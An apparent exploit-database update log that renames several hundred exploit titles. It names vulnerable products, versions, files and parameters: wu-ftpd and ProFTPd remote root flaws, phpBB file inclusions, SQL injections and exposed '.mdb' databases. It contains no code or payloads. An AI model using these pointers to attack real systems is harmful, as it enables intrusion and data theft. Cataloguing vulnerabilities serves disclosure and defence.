DB: 2016-09-06
5 new exploits ProFTPD 1.2.9RC1 - (mod_sql) SQL Injection ProFTPd 1.2.9RC1 - (mod_sql) SQL Injection PHPBB 2.0.4 - PHP Remote File Inclusion Exploit phpBB 2.0.4 - PHP Remote File Inclusion Exploit wu-ftpd 2.6.2 - Off-by-One Remote Root Exploit WU-FTPD 2.6.2 - Off-by-One Remote Root Exploit wu-ftpd 2.6.2 - Remote Root Exploit WU-FTPD 2.6.2 - Remote Root Exploit ProFTPD 1.2.9rc2 - ASCII File Remote Root Exploit ProFTPd 1.2.9rc2 - ASCII File Remote Root Exploit ProFTPD 1.2.7 < 1.2.9rc2 - Remote Root / brute-force Exploit ProFTPd 1.2.7 < 1.2.9rc2 - Remote Root / brute-force Exploit wu-ftpd 2.6.2 - 'wuftpd-freezer.c' Remote Denial of Service WU-FTPD 2.6.2 - 'wuftpd-freezer.c' Remote Denial of Service wu-ftpd 2.6.0 - Remote Root Exploit WU-FTPD 2.6.0 - Remote Root Exploit OpenBSD 2.6 / 2.7ftpd - Remote Exploit OpenBSD 2.6 / 2.7 ftpd - Remote Exploit wu-ftpd 2.6.0 - Remote Format Strings Exploit WU-FTPD 2.6.0 - Remote Format Strings Exploit ProFTPD 1.2.0 (rc2) - memory leakage example Exploit ProFTPd 1.2.0 (rc2) - memory leakage example Exploit ProFTPD 1.2.0pre10 - Remote Denial of Service ProFTPd 1.2.0pre10 - Remote Denial of Service wu-ftpd 2.6.1 - Remote Root Exploit WU-FTPD 2.6.1 - Remote Root Exploit OpenFTPD 0.30.2 - Remote Exploit OpenFTPD 0.30.1 - (message system) Remote Shell Exploit OpenFTPd 0.30.2 - Remote Exploit OpenFTPd 0.30.1 - (message system) Remote Shell Exploit PHP - (PHP-exec-dir) Patch Command Access Restriction Bypass PHP - (php-exec-dir) Patch Command Access Restriction Bypass ProFTPd (ftpdctl) - Local pr_ctrls_connect ProFTPd - (ftpdctl) Local pr_ctrls_connect ProFTPD 1.2.10 - Remote Users Enumeration Exploit ProFTPd 1.2.10 - Remote Users Enumeration Exploit PHPBB 1.0.0 / 2.0.10 - admin_cash.php Remote Exploit phpBB 1.0.0 / 2.0.10 - admin_cash.php Remote Exploit PHP 4.3.9 + PHPBB 2.x - unserialize() Remote Exploit (Compiled) PHP 4.3.9 + phpBB 2.x - unserialize() Remote Exploit (Compiled) Apple QuickTime 6.5.2.10 - '.qtif'Image Parsing Apple QuickTime 6.5.2.10 - '.qtif' Image Parsing wu-ftpd 2.6.2 - File Globbing Denial of Service WU-FTPD 2.6.2 - File Globbing Denial of Service RealPlayer 10 - '.smil'Local Buffer Overflow RealPlayer 10 - '.smil' Local Buffer Overflow PHPBB 2.0.13 - 'downloads.php' mod Remote Exploit phpBB 2.0.13 - 'downloads.php' mod Remote Exploit PHPPgAdmin 4.1.1 - Redirect.php Cross-Site Scripting phpPgAdmin 4.1.1 - Redirect.php Cross-Site Scripting Invision Power Board 2.0.3 - login.php SQL Injection Invision Power Board 2.0.3 - login.php SQL Injection (tutorial) Invision Power Board 2.0.3 - 'login.php' SQL Injection Invision Power Board 2.0.3 - 'login.php' SQL Injection (tutorial) PHPStat 1.5 - (setup.php) Authentication Bypass Exploit (Perl) PHPStat 1.5 - (setup.php) Authentication Bypass Exploit (PHP) (1) PHPStat 1.5 - (setup.php) Authentication Bypass Exploit (PHP) (2) phpStat 1.5 - (setup.php) Authentication Bypass Exploit (Perl) phpStat 1.5 - (setup.php) Authentication Bypass Exploit (PHP) (1) phpStat 1.5 - (setup.php) Authentication Bypass Exploit (PHP) (2) Invision Power Board 1.3.1 - login.php SQL Injection Invision Power Board 1.3.1 - 'login.php' SQL Injection PHPBB 2.0.15 - (highlight) Remote PHP Code Execution phpBB 2.0.15 - (highlight) Remote PHP Code Execution Solaris SPARC / x86 - Local Socket Hijack Exploit Solaris (SPARC / x86) - Local Socket Hijack Exploit PHPBB 2.0.15 - Remote PHP Code Execution Exploit (Metasploit) phpBB 2.0.15 - Remote PHP Code Execution Exploit (Metasploit) Microsoft Windows XP SP2 - 'rdpwd.sys'Remote Kernel Denial of Service Microsoft Windows XP SP2 - 'rdpwd.sys' Remote Kernel Denial of Service PHPBB 2.0.13 - (admin_styles.php) Remote Command Execution Exploit phpBB 2.0.13 - (admin_styles.php) Remote Command Execution Exploit FreeFTPD 1.0.8 - (USER) Remote Buffer Overflow freeFTPd 1.0.8 - (USER) Remote Buffer Overflow FreeFTPD 1.0.10 - (PORT Command) Denial of Service freeFTPd 1.0.10 - (PORT Command) Denial of Service Tftpd32 2.81 - (GET Request) Format String Denial of Service (PoC) TFTPD32 2.81 - (GET Request) Format String Denial of Service (PoC) Microsoft HTML Help Workshop - '.hhp'Denial of Service Microsoft HTML Help Workshop - '.hhp' Denial of Service PHPWebSite 0.10.0-full - (topics.php) SQL Injection phpWebSite 0.10.0-full - (topics.php) SQL Injection Microsoft Visual Studio 6.0 sp6 - '.dbp'Buffer Overflow Microsoft Visual Studio 6.0 sp6 - '.dbp' Buffer Overflow PHPBookingCalendar 1.0c - (details_view.php) SQL Injection phpBookingCalendar 1.0c - (details_view.php) SQL Injection Navicat Premium 11.2.11 (64bit) - Local Database Password Disclosure Microsoft Internet Explorer 6 - 'Internet.HHCtrl'Heap Overflow Microsoft Internet Explorer 6 - 'Internet.HHCtrl' Heap Overflow PHPBB 3 - 'memberlist.php' SQL Injection phpBB 3 - 'memberlist.php' SQL Injection WoW Roster 1.70 - (/lib/PHPbb.php) Remote File Inclusion WoW Roster 1.70 - (/lib/phpBB.php) Remote File Inclusion PHPBB XS 0.58 - (functions.php) Remote File Inclusion phpBB XS 0.58 - (functions.php) Remote File Inclusion phpBB XS 0.58a - (phpbb_root_path) Remote File Inclusion phpBB XS 0.58a - (phpBB_root_path) Remote File Inclusion phpBB Static Topics 1.0 - phpbb_root_path File Include phpBB Static Topics 1.0 - phpBB_root_path File Include PHPBB Security Suite Mod 1.0.0 - (logger_engine.php) Remote File Inclusion Dimension of phpBB 0.2.6 - (phpbb_root_path) Remote File Inclusions phpBB Security Suite Mod 1.0.0 - (logger_engine.php) Remote File Inclusion Dimension of phpBB 0.2.6 - (phpBB_root_path) Remote File Inclusions PHP News Reader 2.6.4 - (PHPbb.inc.php) Remote File Inclusion Exploit PHP News Reader 2.6.4 - (phpBB.inc.php) Remote File Inclusion Exploit PHPBB PlusXL 2.0_272 - (constants.php) Remote File Inclusion Exploit phpBB PlusXL 2.0_272 - (constants.php) Remote File Inclusion Exploit PHPBB Amazonia Mod - 'zufallscodepart.php' Remote File Inclusion Exploit phpBB Amazonia Mod - 'zufallscodepart.php' Remote File Inclusion Exploit PHPBB lat2cyr Mod 1.0.1 - (lat2cyr.php) Remote File Inclusion Exploit phpBB lat2cyr Mod 1.0.1 - (lat2cyr.php) Remote File Inclusion Exploit PHPBB SearchIndexer Mod - 'archive_topic.php' Remote File Inclusion Exploit phpBB SearchIndexer Mod - 'archive_topic.php' Remote File Inclusion Exploit PHPBB Security 1.0.1 - (PHP_security.php) Remote File Inclusion Exploit phpBB Security 1.0.1 - (PHP_security.php) Remote File Inclusion Exploit PGOSD - 'misc/function.php3'Remote File Inclusion PGOSD - 'misc/function.php3' Remote File Inclusion HP-UX 11i - (LIBC TZ enviroment variable) Privilege Escalation HP-UX 11i - (LIBC TZ enviroment Variable) Privilege Escalation ProFTPD 1.3.0 - (sreplace) Remote Stack Overflow (Metasploit) ProFTPd 1.3.0 - (sreplace) Remote Stack Overflow (Metasploit) ProFTPD 1.3.0a - (mod_ctrls support) Local Buffer Overflow (PoC) ProFTPd 1.3.0a - (mod_ctrls support) Local Buffer Overflow (PoC) ProFTPD 1.2.9 rc2 - (ASCII File) Remote Root Exploit ProFTPd 1.2.9 rc2 - (ASCII File) Remote Root Exploit Yrch 1.0 - (plug.inc.php path variable) Remote File Inclusion Exploit Yrch 1.0 - (plug.inc.php path Variable) Remote File Inclusion Exploit Vizayn Haber - 'haberdetay.asp id variable'SQL Injection Vizayn Haber - 'haberdetay.asp id Variable' SQL Injection newsCMSlite - 'newsCMS.mdb'Remote Password Disclosure newsCMSlite - 'newsCMS.mdb' Remote Password Disclosure iG Calendar 1.0 - (user.php id variable) SQL Injection iG Calendar 1.0 - (user.php id Variable) SQL Injection uniForum 4 - 'wbsearch.aspx'SQL Injection uniForum 4 - 'wbsearch.aspx' SQL Injection MGB 0.5.4.5 - (email.php id variable) SQL Injection MGB 0.5.4.5 - (email.php id Variable) SQL Injection Microsoft Help Workshop 4.03.0002 - '.CNT'Buffer Overflow Microsoft Help Workshop 4.03.0002 - '.cnt' Buffer Overflow Microsoft Help Workshop 4.03.0002 - '.HPJ'Buffer Overflow Microsoft Help Workshop 4.03.0002 - '.HPJ' Buffer Overflow Microsoft Visual C++ - '.RC Resource Files'Local Buffer Overflow Microsoft Visual C++ - '.RC Resource Files' Local Buffer Overflow Phpbb Tweaked 3 - (phpbb_root_path) Remote File Inclusion phpBB Tweaked 3 - (phpBB_root_path) Remote File Inclusion phpBB++ Build 100 - (phpbb_root_path) Remote File Inclusion Exploit phpBB++ Build 100 - (phpBB_root_path) Remote File Inclusion Exploit Categories hierarchy phpBB Mod 2.1.2 - (phpbb_root_path) Remote File Inclusion Exploit Categories hierarchy phpBB Mod 2.1.2 - (phpBB_root_path) Remote File Inclusion Exploit ProFTPD 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow (1) ProFTPd 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow (1) ProFTPD 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow (2) ProFTPd 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow (2) News Bin Pro 5.33 - '.NBI'Local Buffer Overflow News Bin Pro 5.33 - '.nbi' Local Buffer Overflow Extreme PHPBB 3.0.1 - (functions.php) Remote File Inclusion Exploit Extreme phpBB 3.0.1 - (functions.php) Remote File Inclusion Exploit Plan 9 Kernel - 'devenv.c OTRUNC/pwrite'Local Exploit Plan 9 Kernel - 'devenv.c OTRUNC/pwrite' Local Exploit Microsoft Windows - '.doc'Malformed Pointers Denial of Service Microsoft Windows - '.doc' Malformed Pointers Denial of Service GestArt Beta 1 - 'aide.php aide'Remote File Inclusion GestArt Beta 1 - 'aide.php aide' Remote File Inclusion ttCMS 4 - 'ez_sql.php lib_path'Remote File Inclusion ttCMS 4 - 'ez_sql.php lib_path' Remote File Inclusion Corel Wordperfect X3 13.0.0.565 - '.PRS'Local Buffer Overflow Corel Wordperfect X3 13.0.0.565 - '.prs' Local Buffer Overflow ProFTPD 1.3.0/1.3.0a - (mod_ctrls) Local Overflow (exec-shield) ProFTPd 1.3.0/1.3.0a - (mod_ctrls) Local Overflow (exec-shield) Winamp 5.3 - '.WMV'Remote Denial of Service Winamp 5.3 - '.wmv' Remote Denial of Service ACDSee 9.0 - '.XPM'Local Buffer Overflow XnView 1.90.3 - '.XPM'Local Buffer Overflow WEBInsta FM 0.1.4 - login.php absolute_path Remote File Inclusion Exploit Corel Paint Shop Pro Photo 11.20 - '.CLP'Buffer Overflow ACDSee 9.0 - '.xpm' Local Buffer Overflow XnView 1.90.3 - '.xpm' Local Buffer Overflow WEBInsta FM 0.1.4 - 'login.php' absolute_path Remote File Inclusion Exploit Corel Paint Shop Pro Photo 11.20 - '.clp' Buffer Overflow ABC-View Manager 1.42 - '.PSP'Buffer Overflow FreshView 7.15 - '.PSP'Buffer Overflow ABC-View Manager 1.42 - '.psp' Buffer Overflow FreshView 7.15 - '.psp' Buffer Overflow Gimp 2.2.14 - '.ras'SUNRAS Plugin Buffer Overflow Gimp 2.2.14 - '.ras' SUNRAS Plugin Buffer Overflow IrfanView 4.00 - '.iff'Buffer Overflow Photoshop CS2/CS3 / Paint Shop Pro 11.20 - '.png'Buffer Overflow Exploit IrfanView 4.00 - '.iff' Buffer Overflow Photoshop CS2/CS3 / Paint Shop Pro 11.20 - '.png' Buffer Overflow Exploit RealPlayer 10 - '.ra'Remote Denial of Service RealPlayer 10 - '.ra' Remote Denial of Service Winamp 5.34 - '.mp4'Code Execution Exploit Winamp 5.34 - '.mp4' Code Execution Exploit Wikivi5 - 'show.php sous_rep'Remote File Inclusion Wikivi5 - 'show.php sous_rep' Remote File Inclusion LeadTools Raster Thumbnail Object Library - 'LTRTM14e.DLL'Buffer Overflow Exploit LeadTools Raster Thumbnail Object Library - 'LTRTM14e.dll' Buffer Overflow Exploit Scallywag - 'template.php path'Remote File Inclusion Scallywag - 'template.php path' Remote File Inclusion Simple Invoices 2007 05 25 - 'index.php submit'SQL Injection Simple Invoices 2007 05 25 - 'index.php submit' SQL Injection Traffic Stats - 'referralUrl.php offset'SQL Injection Traffic Stats - 'referralUrl.php offset' SQL Injection BBS E-Market - 'postscript.php p_mode'Remote File Inclusion BBS E-Market - 'postscript.php p_mode' Remote File Inclusion PHPBB Module SupaNav 1.0.0 - (link_main.php) Remote File Inclusion phpBB Module SupaNav 1.0.0 - (link_main.php) Remote File Inclusion bwired - 'index.php newsID'SQL Injection bwired - 'index.php newsID' SQL Injection CrystalPlayer 1.98 - '.mls'Local Buffer Overflow CrystalPlayer 1.98 - '.mls' Local Buffer Overflow PHP123 Top Sites - 'category.php cat'SQL Injection PHP123 Top Sites - 'category.php cat' SQL Injection Live for Speed S1/S2/Demo - '.mpr replay'Buffer Overflow Live for Speed S1/S2/Demo - '.mpr replay' Buffer Overflow Microsoft Visual 6 - 'VDT70.dll NotSafe'Stack Overflow Microsoft Visual 6 - 'VDT70.dll NotSafe' Stack Overflow Live for Speed S1/S2/Demo - '.ply'Buffer Overflow Live for Speed S1/S2/Demo - '.spr'Buffer Overflow CartWeaver - 'Details.cfm ProdID'SQL Injection Prozilla Pub Site Directory - 'directory.php cat'SQL Injection Live for Speed S1/S2/Demo - '.ply' Buffer Overflow Live for Speed S1/S2/Demo - '.spr' Buffer Overflow CartWeaver - 'Details.cfm ProdID' SQL Injection Prozilla Pub Site Directory - 'directory.php cat' SQL Injection Prozilla Webring Website Script - 'category.php cat'SQL Injection Prozilla Webring Website Script - 'category.php cat' SQL Injection GetMyOwnArcade - 'search.php query'SQL Injection GetMyOwnArcade - 'search.php query' SQL Injection ProFTPD 1.x (module mod_tls) - Remote Buffer Overflow ProFTPd 1.x (module mod_tls) - Remote Buffer Overflow Sisfo Kampus 2006 - 'dwoprn.php f'Remote File Download Sisfo Kampus 2006 - 'dwoprn.php f' Remote File Download Gelato - 'index.php post'SQL Injection Gelato - 'index.php post' SQL Injection modifyform - 'modifyform.html'Remote File Inclusion modifyform - 'modifyform.html' Remote File Inclusion phpBB Plus 1.53 - (phpbb_root_path) Remote File Inclusion phpBB Plus 1.53 - (phpBB_root_path) Remote File Inclusion Black Lily 2007 - 'products.php class'SQL Injection Black Lily 2007 - 'products.php class' SQL Injection PHPBB Mod OpenID 0.2.0 - BBStore.php Remote File Inclusion phpBB Mod OpenID 0.2.0 - BBStore.php Remote File Inclusion wzdftpd 0.8.0 - (USER) Remote Denial of Service WzdFTPD 0.8.0 - (USER) Remote Denial of Service Solaris 10 - x86/sparc sysinfo Kernel Memory Disclosure Exploit Solaris - fifofs I_PEEK Kernel Memory Disclosure Exploit (x86/sparc) Solaris 10 (sparc/x86) - sysinfo Kernel Memory Disclosure Exploit Solaris (sparc/x86) - fifofs I_PEEK Kernel Memory Disclosure Exploit Mcms Easy Web Make - 'index.php template'Local File Inclusion Mcms Easy Web Make - 'index.php template' Local File Inclusion MOG-WebShop - 'index.php group'SQL Injection MOG-WebShop - 'index.php group' SQL Injection ClipShare - 'uprofile.php UID'SQL Injection ClipShare - 'uprofile.php UID' SQL Injection samPHPweb - 'db.php commonpath'Remote File Inclusion samPHPweb - 'db.php commonpath' Remote File Inclusion RichStrong CMS - 'showproduct.asp cat'SQL Injection RichStrong CMS - 'showproduct.asp cat' SQL Injection Microsoft Visual Basic Enterprise Ed. 6 SP6 - '.dsr'File Handling Buffer Overflow Exploit Microsoft Visual Basic Enterprise Ed. 6 SP6 - '.dsr' File Handling Buffer Overflow Exploit IrfanView 4.10 - '.fpx'Memory Corruption Exploit IrfanView 4.10 - '.fpx' Memory Corruption Exploit Fully Modded PHPBB - 'kb.php' SQL Injection Fully Modded phpBB - 'kb.php' SQL Injection ASPapp - 'links.asp CatId'SQL Injection ASPapp - 'links.asp CatId' SQL Injection HIS-Webshop - 'his-webshop.pl t'Remote File Disclosure HIS-Webshop - 'his-webshop.pl t' Remote File Disclosure Easynet Forum Host - 'forum.php forum'SQL Injection Easynet Forum Host - 'forum.php forum' SQL Injection Blog PixelMotion - 'index.php categorie'SQL Injection Blog PixelMotion - 'index.php categorie' SQL Injection Prozilla Forum Service - 'forum.php forum'SQL Injection Prozilla Forum Service - 'forum.php forum' SQL Injection Ksemail - 'index.php language'Local File Inclusion Ksemail - 'index.php language' Local File Inclusion RX Maxsoft - 'popup_img.php fotoID'SQL Injection RX Maxsoft - 'popup_img.php fotoID' SQL Injection Apartment Search Script - 'listtest.php r'SQL Injection Apartment Search Script - 'listtest.php r' SQL Injection Jokes Site Script - 'jokes.php?catagorie'SQL Injection Jokes Site Script - 'jokes.php?catagorie' SQL Injection Anserv Auction XL - 'viewfaqs.php cat'SQL Injection Anserv Auction XL - 'viewfaqs.php cat' SQL Injection fipsCMS - 'print.asp lg'SQL Injection fipsCMS - 'print.asp lg' SQL Injection PostcardMentor - 'step1.asp cat_fldAuto'SQL Injection PostcardMentor - 'step1.asp cat_fldAuto' SQL Injection HispaH Model Search - 'cat.php cat'SQL Injection HispaH Model Search - 'cat.php cat' SQL Injection EMO Realty Manager - 'news.php ida'SQL Injection The Real Estate Script - 'dpage.php docID'SQL Injection EMO Realty Manager - 'news.php ida' SQL Injection The Real Estate Script - 'dpage.php docID' SQL Injection GLLCTS2 - 'listing.php sort'Blind SQL Injection GLLCTS2 - 'listing.php sort' Blind SQL Injection PHPMyCart - 'shop.php cat'SQL Injection PHPMyCart - 'shop.php cat' SQL Injection BaSiC-CMS - 'index.php r'SQL Injection BaSiC-CMS - 'index.php r' SQL Injection Mybizz-Classifieds - 'index.php cat'SQL Injection Mybizz-Classifieds - 'index.php cat' SQL Injection Carscripts Classifieds - 'index.php cat'SQL Injection BoatScripts Classifieds - 'index.php type'SQL Injection Carscripts Classifieds - 'index.php cat' SQL Injection BoatScripts Classifieds - 'index.php type' SQL Injection RSS-Aggregator - 'display.php path'Remote File Inclusion RSS-Aggregator - 'display.php path' Remote File Inclusion MyBlog: PHP and MySQL Blog/CMS software - SQL / Cross-Site Scripting MyBlog: PHP and MySQL Blog/CMS software - SQL Injection / Cross-Site Scripting CodeDB - 'list.php lang'Local File Inclusion CodeDB - 'list.php lang' Local File Inclusion HRS Multi - 'picture_pic_bv.asp key'Blind SQL Injection HRS Multi - 'picture_pic_bv.asp key' Blind SQL Injection MojoPersonals - 'mojoClassified.cgi mojo'Blind SQL Injection MojoJobs - 'mojoJobs.cgi mojo'Blind SQL Injection MojoAuto - 'mojoAuto.cgi mojo'Blind SQL Injection MojoPersonals - 'mojoClassified.cgi mojo' Blind SQL Injection MojoJobs - 'mojoJobs.cgi mojo' Blind SQL Injection MojoAuto - 'mojoAuto.cgi mojo' Blind SQL Injection Youtuber Clone - 'ugroups.php UID'SQL Injection Youtuber Clone - 'ugroups.php UID' SQL Injection ZeeReviews - 'comments.php ItemID'SQL Injection ZeeReviews - 'comments.php ItemID' SQL Injection Acoustica Beatcraft 1.02 Build 19 - '.bcproj'Local Buffer Overflow Exploit Acoustica Beatcraft 1.02 Build 19 - '.bcproj' Local Buffer Overflow Exploit Living Local Website - 'listtest.php r'SQL Injection Living Local Website - 'listtest.php r' SQL Injection AWStats Totals - 'AWStatstotals.php sort'Remote Code Execution Exploit AWStats Totals - 'AWStatstotals.php sort' Remote Code Execution Exploit Pre Real Estate Listings - 'search.php c'SQL Injection Pre Real Estate Listings - 'search.php c' SQL Injection Hotel reservation System - 'city.asp city'Blind SQL Injection Hotel reservation System - 'city.asp city' Blind SQL Injection Postfix < 2.4.9 / 2.5.5 / 2.6-20080902 - '.forward'Local Denial of Service Postfix < 2.4.9 / 2.5.5 / 2.6-20080902 - '.forward' Local Denial of Service Availscript Article Script - 'view.php v'SQL Injection Availscript Article Script - 'view.php v' SQL Injection JETIK-WEB Software - 'sayfa.php kat'SQL Injection JETIK-WEB Software - 'sayfa.php kat' SQL Injection Microsoft Windows GDI+ - '.ico'Remote Division By Zero Exploit Microsoft Windows GDI+ - '.ico' Remote Division By Zero Exploit ArabCMS - 'rss.php rss'Local File Inclusion ArabCMS - 'rss.php rss' Local File Inclusion Easynet4u faq Host - 'faq.php faq'SQL Injection Easynet4u faq Host - 'faq.php faq' SQL Injection Real Estate Scripts 2008 - 'index.php cat'SQL Injection Real Estate Scripts 2008 - 'index.php cat' SQL Injection RaidenFTPD 2.4 build 3620 - Remote Denial of Service RaidenFTPd 2.4 build 3620 - Remote Denial of Service XOOPS Module xhresim - 'index.php no'SQL Injection XOOPS Module xhresim - 'index.php no' SQL Injection Solaris 9 - [UltraSPARC] sadmind Remote Root Exploit Solaris 9 (UltraSPARC) - sadmind Remote Root Exploit DorsaCMS - 'ShowPage.aspx'SQL Injection YDC - 'kdlist.php cat'SQL Injection DorsaCMS - 'ShowPage.aspx' SQL Injection YDC - 'kdlist.php cat' SQL Injection Aj RSS Reader - 'EditUrl.php url'SQL Injection Aj RSS Reader - 'EditUrl.php url' SQL Injection Aiocp 1.4 - (poll_id) SQL Injection AIOCP 1.4 - 'poll_id' SQL Injection SFS EZ Auction - 'viewfaqs.php cat'Blind SQL Injection SFS EZ Career - 'content.php topic'SQL Injection SFS EZ Top Sites - 'topsite.php ts'SQL Injection SFS EZ Auction - 'viewfaqs.php cat' Blind SQL Injection SFS EZ Career - 'content.php topic' SQL Injection SFS EZ Top Sites - 'topsite.php ts' SQL Injection SFS EZ Pub Site - 'directory.php cat'SQL Injection SFS EZ Pub Site - 'directory.php cat' SQL Injection AJ ARTICLE - 'featured_article.php mode'SQL Injection AJ ARTICLE - 'featured_article.php mode' SQL Injection YourFreeWorld Shopping Cart - 'index.php c'Blind SQL Injection Maran PHP Shop - 'prod.php cat'SQL Injection YourFreeWorld Shopping Cart - 'index.php c' Blind SQL Injection Maran PHP Shop - 'prod.php cat' SQL Injection PHP Auto Listings - 'moreinfo.php pg'SQL Injection PHP Auto Listings - 'moreinfo.php pg' SQL Injection VLC Media Player < 0.9.6 - '.rt'Stack Buffer Overflow VLC Media Player < 0.9.6 - '.rt' Stack Buffer Overflow Minigal b13 - 'index.php list'Remote File Disclosure Exploit Minigal b13 - 'index.php list' Remote File Disclosure Exploit VCalendar - 'VCalendar.mdb'Remote Database Disclosure VCalendar - 'VCalendar.mdb' Remote Database Disclosure VideoGirls BiZ - 'view_snaps.php type'Blind SQL Injection VideoGirls BiZ - 'view_snaps.php type' Blind SQL Injection ParsBlogger - 'blog.asp wr'SQL Injection ParsBlogger - 'blog.asp wr' SQL Injection BaSiC-CMS - 'acm2000.mdb'Remote Database Disclosure BaSiC-CMS - 'acm2000.mdb' Remote Database Disclosure cpCommerce 1.2.6 - (URL Rewrite) Input variable overwrite / Authentication Bypass Cain & Abel 4.9.24 - '.rdp'Stack Overflow cpCommerce 1.2.6 - (URL Rewrite) Input Variable overwrite / Authentication Bypass Cain & Abel 4.9.24 - '.rdp' Stack Overflow Ocean12 Mailing List Manager Gold - DD / SQL / Cross-Site Scripting Ocean12 Mailing List Manager Gold - File Disclosure / SQL Injection / Cross-Site Scripting Cain & Abel 4.9.23 - '.rdp'Buffer Overflow Exploit Cain & Abel 4.9.23 - '.rdp' Buffer Overflow Exploit User Engine Lite ASP - 'users.mdb'Database Disclosure User Engine Lite ASP - 'users.mdb' Database Disclosure Easy News Content Management - 'News.mdb'Database Disclosure Easy News Content Management - 'News.mdb' Database Disclosure RankEm - 'rankup.asp siteID'SQL Injection RankEm - 'rankup.asp siteID' SQL Injection Cold BBS - 'cforum.mdb'Remote Database Disclosure Cold BBS - 'cforum.mdb' Remote Database Disclosure ASP PORTAL - 'xportal.mdb'Remote Database Disclosure ASP PORTAL - 'xportal.mdb' Remote Database Disclosure Webmaster Marketplace - 'member.php u'SQL Injection Webmaster Marketplace - 'member.php u' SQL Injection CF_Calendar - 'calendarevent.cfm'SQL Injection CF_Calendar - 'calendarevent.cfm' SQL Injection CFMBLOG - 'index.cfm categorynbr'Blind SQL Injection CFMBLOG - 'index.cfm categorynbr' Blind SQL Injection MyCal Personal Events Calendar - 'mycal.mdb'Database Disclosure MyCal Personal Events Calendar - 'mycal.mdb' Database Disclosure ASPired2Quote - 'quote.mdb'Remote Database Disclosure ASPired2Quote - 'quote.mdb' Remote Database Disclosure CodeAvalanche FreeForum - 'CAForum.mdb'Database Disclosure CodeAvalanche FreeForum - 'CAForum.mdb' Database Disclosure CodeAvalanche Directory - 'CADirectory.mdb'Database Disclosure CodeAvalanche FreeForAll - 'CAFFAPage.mdb'Database Disclosure CodeAvalanche Directory - 'CADirectory.mdb' Database Disclosure CodeAvalanche FreeForAll - 'CAFFAPage.mdb' Database Disclosure CodeAvalanche Articles - 'CAArticles.mdb'Database Disclosure CodeAvalanche RateMySite - 'CARateMySite.mdb'Database Disclosure CodeAvalanche Articles - 'CAArticles.mdb' Database Disclosure CodeAvalanche RateMySite - 'CARateMySite.mdb' Database Disclosure CFAGCMS 1 - 'right.php title'SQL Injection CFAGCMS 1 - 'right.php title' SQL Injection click&rank - SQL / Cross-Site Scripting click&rank - SQL Injection / Cross-Site Scripting Liberum Help Desk 0.97.3 - SQL / DD Liberum Help Desk 0.97.3 - SQL Injection / File Disclosure QuickerSite Easy CMS - 'QuickerSite.mdb'Database Disclosure QuickerSite Easy CMS - 'QuickerSite.mdb' Database Disclosure MyPHPsite - 'index.php mod'Local File Inclusion MyPHPsite - 'index.php mod' Local File Inclusion MyPBS - 'index.php seasonID'SQL Injection MyPBS - 'index.php seasonID' SQL Injection Extract Website - 'download.php filename'File Disclosure Extract Website - 'download.php filename' File Disclosure CoolPlayer 2.19 - '.Skin'Local Buffer Overflow CoolPlayer 2.19 - '.Skin' Local Buffer Overflow Sepcity Shopping Mall - 'shpdetails.asp ID'SQL Injection Sepcity Lawyer Portal - 'deptdisplay.asp ID'SQL Injection Sepcity Shopping Mall - 'shpdetails.asp ID' SQL Injection Sepcity Lawyer Portal - 'deptdisplay.asp ID' SQL Injection Sepcity Classified - 'classdis.asp ID'SQL Injection Sepcity Classified - 'classdis.asp ID' SQL Injection Ayemsis Emlak Pro - 'acc.mdb'Database Disclosure Ayemsis Emlak Pro - 'acc.mdb' Database Disclosure VUPlayer 2.49 - '.wax'Local Buffer Overflow VUPlayer 2.49 - '.wax' Local Buffer Overflow BlogHelper - 'common_db.inc'Remote Config File Disclosure PollHelper - 'poll.inc'Remote Config File Disclosure BlogHelper - 'common_db.inc' Remote Config File Disclosure PollHelper - 'poll.inc' Remote Config File Disclosure Audacity 1.6.2 - '.aup'Remote Off-by-One Crash Exploit Audacity 1.6.2 - '.aup' Remote Off-by-One Crash Exploit QuoteBook - 'poll.inc'Remote Config File Disclosure QuoteBook - 'poll.inc' Remote Config File Disclosure XOOPS Module tadbook2 - 'open_book.php book_sn'SQL Injection XOOPS Module tadbook2 - 'open_book.php book_sn' SQL Injection Social Engine - 'browse_classifieds.php s'SQL Injection Social Engine - 'browse_classifieds.php s' SQL Injection Realtor 747 - 'define.php INC_DIR'Remote File Inclusion Realtor 747 - 'define.php INC_DIR' Remote File Inclusion OTSTurntables 1.00.027 - '.ofl'Local Stack Overflow OTSTurntables 1.00.027 - '.ofl' Local Stack Overflow SCMS 1 - 'index.php p'Local File Inclusion SCMS 1 - 'index.php p' Local File Inclusion Graugon Gallery 1.0 - Cross-Site Scripting / SQL / Cookie Bypass Graugon Gallery 1.0 - Cross-Site Scripting / SQL Injection / Cookie Bypass Baran CMS 1.0 - Arbitrary ASP File Upload / DB / SQL / Cross-Site Scripting / CM Baran CMS 1.0 - Arbitrary ASP File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / CM pHNews Alpha 1 - 'header.php mod'SQL Injection pHNews Alpha 1 - 'header.php mod' SQL Injection i-dreams GB Server - 'admin.dat'File Disclosure i-dreams GB Server - 'admin.dat' File Disclosure VUplayer 2.49 - '.cue'Local Buffer Overflow VUplayer 2.49 - '.cue' Local Buffer Overflow VUPlayer 2.49 - '.cue'Universal Buffer Overflow VUPlayer 2.49 - '.cue' Universal Buffer Overflow Chasys Media Player 1.1 - '.cue'Stack Overflow Chasys Media Player 1.1 - '.cue' Stack Overflow Chasys Media Player - '.lst Playlist'Local Buffer Overflow Chasys Media Player - '.lst Playlist' Local Buffer Overflow BS.Player 2.34 - '.bsl'Universal SEH Overwrite BS.Player 2.34 - '.bsl' Universal SEH Overwrite POP Peeper 3.4.0.0 - '.eml'Universal SEH Overwrite POP Peeper 3.4.0.0 - '.eml' Universal SEH Overwrite Abee Chm Maker 1.9.5 - '.CMP'Stack Overflow Abee Chm Maker 1.9.5 - '.CMP' Stack Overflow ActiveKB Knowledgebase - 'loadpanel.php Panel'Local File Inclusion ActiveKB Knowledgebase - 'loadpanel.php Panel' Local File Inclusion ftpdmin 0.96 - RNFR Remote Buffer Overflow (xp sp3/case study) FTPDMIN 0.96 - RNFR Remote Buffer Overflow (xp sp3/case study) ftpdmin 0.96 - Arbitrary File Disclosure Exploit FTPDMIN 0.96 - Arbitrary File Disclosure Exploit Jamroom - 'index.php t'Local File Inclusion Jamroom - 'index.php t' Local File Inclusion W2B phpEmployment - 'conf.inc'File Disclosure W2B phpEmployment - 'conf.inc' File Disclosure phpAdBoard - 'conf.inc'Remote Config File Disclosure 